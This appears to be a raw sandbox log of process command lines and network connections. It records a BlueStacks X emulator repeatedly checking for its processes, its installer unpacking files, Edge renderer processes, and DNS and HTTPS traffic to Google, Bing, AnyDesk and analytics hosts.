C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=160 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=161 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10644 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=162 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=163 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=164 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=165 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10536 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=166 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10664 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
F:\BlueStacks X\BlueStacks X.exe
"F:\BlueStacks X\BlueStacks X.exe"
F:\BlueStacks X\BlueStacksWeb.exe
BlueStacksWeb.exe --type=renderer --disable-speech-api --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations,NetworkServiceInProcess,TracingServiceInProcess --disable-features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,InstalledApp,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebUSB --lang=en --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=3824 /prefetch:1
F:\BlueStacks X\BlueStacksWeb.exe
BlueStacksWeb.exe --type=renderer --disable-speech-api --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations,NetworkServiceInProcess,TracingServiceInProcess --disable-features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,InstalledApp,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebUSB --lang=en --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=3916 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=168 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8532 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=169 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=170 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7652 /prefetch:1
F:\ProjectTitan\Engine\CrashReport.dll
"F:\ProjectTitan\Engine\CrashReport.dll" /UploadBsod
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=172 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=173 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=174 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Users\Admin\AppData\Local\BlueStacks X\BlueStacks-Installer_5.14.22.1003_amd64_native.exe
"C:\Users\Admin\AppData\Local\BlueStacks X\BlueStacks-Installer_5.14.22.1003_amd64_native.exe" -s -defaultImageName Pie64 -imageToLaunch Pie64 -skipBinaryShortcuts -appToLaunch=bsx
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\Bootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\Bootstrapper.exe" -s -defaultImageName Pie64 -imageToLaunch Pie64 -skipBinaryShortcuts -appToLaunch=bsx
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\BlueStacksInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\BlueStacksInstaller.exe" -s -defaultImageName="Pie64" -imageToLaunch="Pie64" -skipBinaryShortcuts -appToLaunch="bsx" -parentpath="C:\Users\Admin\AppData\Local\BlueStacks X\BlueStacks-Installer_5.14.22.1003_amd64_native.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\CommonInstallUtils.zip" -o"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\" -aoa
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtRedistx64.zip" -o"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\" -aoa
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq BlueStacks X.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-ForceGPU.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-ForceGPU.exe" 1 "C:\Program Files\BlueStacks_nxt"
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 1 2
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 4 2
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 2 2
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 1 1
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 4 1
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe" 2 1
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-CheckCpu.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-CheckCpu.exe" --cmd checkSSE4
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\\HD-GLCheck.exe" 2
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\PF.zip" -o"C:\Program Files\BlueStacks_nxt" -aoa
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\\HD-GLCheck.exe" 3
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\HD-GLCheck.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\\HD-GLCheck.exe" 1
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtRedistx64.zip" -o"C:\Program Files\BlueStacks_nxt" -aoa
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq HD-Player.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | anydesk.com | udp |
| GB | 18.244.114.94:443 | anydesk.com | tcp |
| GB | 18.244.114.94:443 | anydesk.com | tcp |
| US | 8.8.8.8:53 | ad-wa.anydesk.com | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| DE | 167.235.224.171:443 | ad-wa.anydesk.com | tcp |
| DE | 167.235.224.171:443 | ad-wa.anydesk.com | tcp |
| GB | 142.250.180.3:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | www.anydesk.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 94.114.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.224.235.167.in-addr.arpa | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | tracking.g2crowd.com | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 104.18.43.31:443 | tracking.g2crowd.com | tcp |
| GB | 142.250.180.3:443 | www.recaptcha.net | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 172.64.155.119:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.177.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.43.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.anydesk.com | udp |
| DE | 188.40.104.135:443 | download.anydesk.com | tcp |
| DE | 188.40.104.135:443 | download.anydesk.com | tcp |
| GB | 18.244.114.94:443 | www.anydesk.com | tcp |
| US | 8.8.8.8:53 | www.dwin1.com | udp |
| US | 8.8.8.8:53 | js.hs-scripts.com | udp |
| US | 8.8.8.8:53 | serve.albacross.com | udp |
| US | 8.8.8.8:53 | scripts.iconnode.com | udp |
| US | 104.16.138.209:443 | js.hs-scripts.com | tcp |
| GB | 18.164.68.15:443 | serve.albacross.com | tcp |
| GB | 108.138.233.18:443 | www.dwin1.com | tcp |
| GB | 52.84.90.118:443 | scripts.iconnode.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | js.hs-banner.com | udp |
| US | 8.8.8.8:53 | js.usemessages.com | udp |
| US | 8.8.8.8:53 | js.hs-analytics.net | udp |
| US | 8.8.8.8:53 | lantern.roeyecdn.com | udp |
| US | 172.64.153.27:443 | js.hs-banner.com | tcp |
| GB | 18.245.187.123:443 | lantern.roeyecdn.com | tcp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| US | 104.16.75.142:443 | js.usemessages.com | tcp |
| US | 104.17.175.201:443 | js.hs-analytics.net | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | api.hubspot.com | udp |
| US | 8.8.8.8:53 | track.hubspot.com | udp |
| US | 172.64.153.27:443 | js.hs-banner.com | tcp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| US | 104.16.117.116:443 | track.hubspot.com | tcp |
| US | 104.16.118.116:443 | track.hubspot.com | tcp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.104.40.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.138.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.68.164.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.233.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.90.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.153.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.75.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.175.17.104.in-addr.arpa | udp |
